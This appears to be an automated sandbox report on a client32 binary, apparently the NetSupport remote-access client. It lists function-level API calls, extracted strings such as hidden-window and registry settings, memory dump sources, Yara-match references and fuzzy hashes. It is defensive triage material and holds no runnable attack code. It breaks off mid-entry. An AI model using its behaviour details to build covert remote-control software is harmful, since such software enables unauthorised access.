                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$CloseCurrentHandleLibraryOpenToken$AddressErrorFreeInformationLastLoadProc
                                                                              • String ID: Kernel32.dll$ProcessIdToSessionId
                                                                              • API String ID: 219584714-2825297712
                                                                              • Opcode ID: e865c6473b299d360233d20d6969acab5fbd0a0a238613220fb6c2a45ad82976
                                                                              • Instruction ID: 420031f46cca3c2d8ff2aa46f1ed04d10c13eca04bac1e8faae0ba62584c02a7
                                                                              • Opcode Fuzzy Hash: e865c6473b299d360233d20d6969acab5fbd0a0a238613220fb6c2a45ad82976
                                                                              • Instruction Fuzzy Hash: 5C4119B5E416299FDB15DFE9DD89AAEFBB8FB08B04F10052AF421E3644D77099018B90
                                                                              Function 1101F0D0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 116windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 1101F0FE
                                                                              • SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1101F11D
                                                                                • Part of subcall function 110CCE60: GetWindowRect.USER32(110CEFF5,?), ref: 110CCE7C
                                                                                • Part of subcall function 110CCE60: SetRectEmpty.USER32(?), ref: 110CCE88
                                                                              • DeleteObject.GDI32(00000000), ref: 1101F16C
                                                                              • DeleteObject.GDI32(00000000), ref: 1101F178
                                                                              • CreateFontIndirectA.GDI32(?), ref: 1101F187
                                                                              • CreateFontIndirectA.GDI32(?), ref: 1101F19F
                                                                              • GetMenuItemCount.USER32 ref: 1101F1A7
                                                                              • _memset.LIBCMT ref: 1101F1CF
                                                                              • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F20C
                                                                              • __strdup.LIBCMT ref: 1101F221
                                                                              • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1101F279
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InfoItemMenu$CreateDeleteFontIndirectObjectRect_memset$CountEmptyParametersSystemWindow__strdup
                                                                              • String ID: 0$MakeOwnerDraw
                                                                              • API String ID: 1249465458-1190305232
                                                                              • Opcode ID: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
                                                                              • Instruction ID: cad075490b8b101532292c9a84c7126ab9bfd0db94d612dc2b0baac2de7b47d0
                                                                              • Opcode Fuzzy Hash: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
                                                                              • Instruction Fuzzy Hash: 19417E71D012399BDB64DFA4CC89BD9FBB8BB09708F0001D9E508A7284DBB46A84CF94
                                                                              Function 110420B0 Relevance: 22.7, APIs: 1, Strings: 14, Instructions: 181sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • Sleep.KERNEL32(000005DC,?,_License,Product,0000000A,00000000), ref: 110420FB
                                                                                • Part of subcall function 1105E950: __itow.LIBCMT ref: 1105E975
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep__itow__wcstoi64
                                                                              • String ID: **** Reset expire flag$Client$DisableAudio$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DoNewLic received (VistaUI=%d)$Expired$IsFree %d, was free %d$Product$Reset JoinClass, ReplayMenu, RequestHelp, Journal and Audio, ts=%d, vui=%d, config %x$_License
                                                                              • API String ID: 4129630603-1903392697
                                                                              • Opcode ID: d46471da32b8e076ae62e4517dea457e2a850050897a959a9ec011138dfc9d33
                                                                              • Instruction ID: f1bcba3b4901feba08b80abf289acb79b6efd6a89dcbef1bb648f8c495c40a7b
                                                                              • Opcode Fuzzy Hash: d46471da32b8e076ae62e4517dea457e2a850050897a959a9ec011138dfc9d33
                                                                              • Instruction Fuzzy Hash: 2251497CB421267BE251C692ECA1FAAFB59AF40708F508494F91D3B6C5DB217A00C3E6
                                                                              Function 11008270 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 264windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ReleaseDC.USER32(?,?), ref: 110082C5
                                                                              • _free.LIBCMT ref: 110083F3
                                                                              • SelectObject.GDI32(?,?), ref: 11008415
                                                                              • DeleteDC.GDI32(?), ref: 11008422
                                                                              • DeleteObject.GDI32(?), ref: 1100842F
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • GetDC.USER32(00000000), ref: 1100845D
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 1100846A
                                                                              • CreateCompatibleBitmap.GDI32(?,00000004,00000010), ref: 11008481
                                                                              • SelectObject.GDI32(?,00000000), ref: 11008495
                                                                              • _malloc.LIBCMT ref: 110084F5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Object$CompatibleCreateDeleteSelect$BitmapErrorExitLastMessageProcessRelease_free_mallocwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 2152670842-2830328467
                                                                              • Opcode ID: a992970416ae98f5764fdb88d940cebc96354c4d0f2882b7071d2e963891bf7d
                                                                              • Instruction ID: 3850b8ccd8beb0e98ab4cbe1f7b01c035796fd6338f527faacd148ed971815aa
                                                                              • Opcode Fuzzy Hash: a992970416ae98f5764fdb88d940cebc96354c4d0f2882b7071d2e963891bf7d
                                                                              • Instruction Fuzzy Hash: D0B1F7B5A00B019FD364CF29C984AD7B7E5FB88359F10892EE5AE97351DB30B941CB50
                                                                              Function 11131320 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 187COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,11139C95,00000000), ref: 11131428
                                                                              • ShowWindow.USER32(00000000,00000000,?,11139C95,00000000), ref: 11131457
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastShowWindow
                                                                              • String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
                                                                              • API String ID: 3252650109-4091810678
                                                                              • Opcode ID: 0ae299210a7d0d5a262dbccdfbf7f866bd70b7d9559bf6e9f26038e806d2e655
                                                                              • Instruction ID: 1b40a51cdbaebc86ba70b46d463032212dc909346aab7ab50ce078dfded898e8
                                                                              • Opcode Fuzzy Hash: 0ae299210a7d0d5a262dbccdfbf7f866bd70b7d9559bf6e9f26038e806d2e655
                                                                              • Instruction Fuzzy Hash: 2161D571B84325ABE711CF90CC85F69F774E784B29F104129F625AB2C4EBB56940CB84
                                                                              Function 110F7300 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 137libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll,AB86ACF8,1102E747,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110F732D
                                                                              • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7372
                                                                              • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73C3
                                                                              • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F73D8
                                                                              • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73FD
                                                                              • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7412
                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
                                                                              • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7440
                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7451
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastLibraryProc$Free$Load
                                                                              • String ID: WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                              • API String ID: 2188719708-2019804778
                                                                              • Opcode ID: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                              • Instruction ID: 4e6ae02227e90de241cbe6e1e3770e4d50810e342ffe13a4e1f679076b39a632
                                                                              • Opcode Fuzzy Hash: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                              • Instruction Fuzzy Hash: 49511371D4121AEFDB14DFD9D9C5AAEFBF5FB48300F51846AE829E3600DB34A9018B61
                                                                              Function 1103F520 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 126windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                              • GetDlgItem.USER32(?,00000472), ref: 1103F557
                                                                                • Part of subcall function 11160450: SetPropA.USER32(00000000,00000000,00000000), ref: 1116046E
                                                                                • Part of subcall function 11160450: SetWindowLongA.USER32(00000000,000000FC,1115FE60), ref: 1116047F
                                                                              • wsprintfA.USER32 ref: 1103F5D1
                                                                              • GetSystemMenu.USER32(?,00000000), ref: 1103F5F6
                                                                              • EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103F604
                                                                              • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000003), ref: 1103F663
                                                                              • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1103F692
                                                                              • MessageBeep.USER32(00000000), ref: 1103F696
                                                                                • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Item$FolderMenuPath$BeepEnableFileLongMessageModuleNameObjectPropRectShowSystemTextwsprintf
                                                                              • String ID: %sblockapp.jpg$BlockedAppFile$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1300213680-78349004
                                                                              • Opcode ID: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                              • Instruction ID: 6f07d7162ed8c172429d77206b5c6f615c65d6256772802cbf9fe3e1e633a07a
                                                                              • Opcode Fuzzy Hash: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                              • Instruction Fuzzy Hash: 0641EE757403197FD720DBA4CC86FDAF3A4AB48B08F104568F3666B5C0DAB0B980CB55
                                                                              Function 111060B0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 84fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 111060BD
                                                                              • EnterCriticalSection.KERNEL32(111F160C,?,00000000,?,?,1114E3DD,?,1118D473,?,1118D473,000000FF,?,1114E7EB), ref: 111060C6
                                                                              • GetTickCount.KERNEL32 ref: 111060CC
                                                                              • GetTickCount.KERNEL32 ref: 111060FE
                                                                              • LeaveCriticalSection.KERNEL32(111F160C,?,00000000,?,?,1114E3DD,?,1118D473,?,1118D473,000000FF,?,1114E7EB), ref: 11106107
                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,1114E3DD,?,1118D473,?,1118D473,000000FF,?,1114E7EB), ref: 11106128
                                                                              • WriteFile.KERNEL32(00000000,1118D473,?,?,00000000,?,00000000,?,?,1114E3DD,?,1118D473,?,1118D473,000000FF), ref: 11106140
                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,1114E3DD,?,1118D473,?,1118D473,000000FF,?,1114E7EB), ref: 1110614D
                                                                              • GetTickCount.KERNEL32 ref: 1110615C
                                                                              • LeaveCriticalSection.KERNEL32(111F160C,?,00000000,?,?,1114E3DD,?,1118D473,?,1118D473,000000FF,?,1114E7EB), ref: 11106165
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$CountTick$Leave$Enter$FileWrite
                                                                              • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                              • API String ID: 831250470-625438208
                                                                              • Opcode ID: b9d1af00e1bf6dd2141f06b6bc4c907b37dd27444a28205debb36fb9e20f67e7
                                                                              • Instruction ID: 13f5c4759399fea5f197c2842d94d2023bcd330517dc4026a62a2474a30daa22
                                                                              • Opcode Fuzzy Hash: b9d1af00e1bf6dd2141f06b6bc4c907b37dd27444a28205debb36fb9e20f67e7
                                                                              • Instruction Fuzzy Hash: 08210B79A40228AFDB009FB5DD88DAAFBA8EB863197140576FC19D7605D631DC44CBE0
                                                                              Function 1105F200 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 368COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 1105F251
                                                                              • wsprintfA.USER32 ref: 1105F265
                                                                                • Part of subcall function 110ED570: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105F29C,?,00000000,?,00000000,75BF8400,?,?,1105F29C,80000001), ref: 110ED59B
                                                                                • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                              • wsprintfA.USER32 ref: 1105F5D6
                                                                                • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$ExitProcess$CreateEnumErrorLastMessageOpen_strrchr
                                                                              • String ID: %s\%s$ConfigList$General\ProductId$IsA()$NetSupport School$NetSupport School Pro$Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList$Software\NetSupport Ltd$Software\Productive Computer Insight$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 273891520-33395967
                                                                              • Opcode ID: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
                                                                              • Instruction ID: 955d7069f5cd37ed2049fe2a08fe06563fb7c7f4ee9c814884e1c508eb43a074
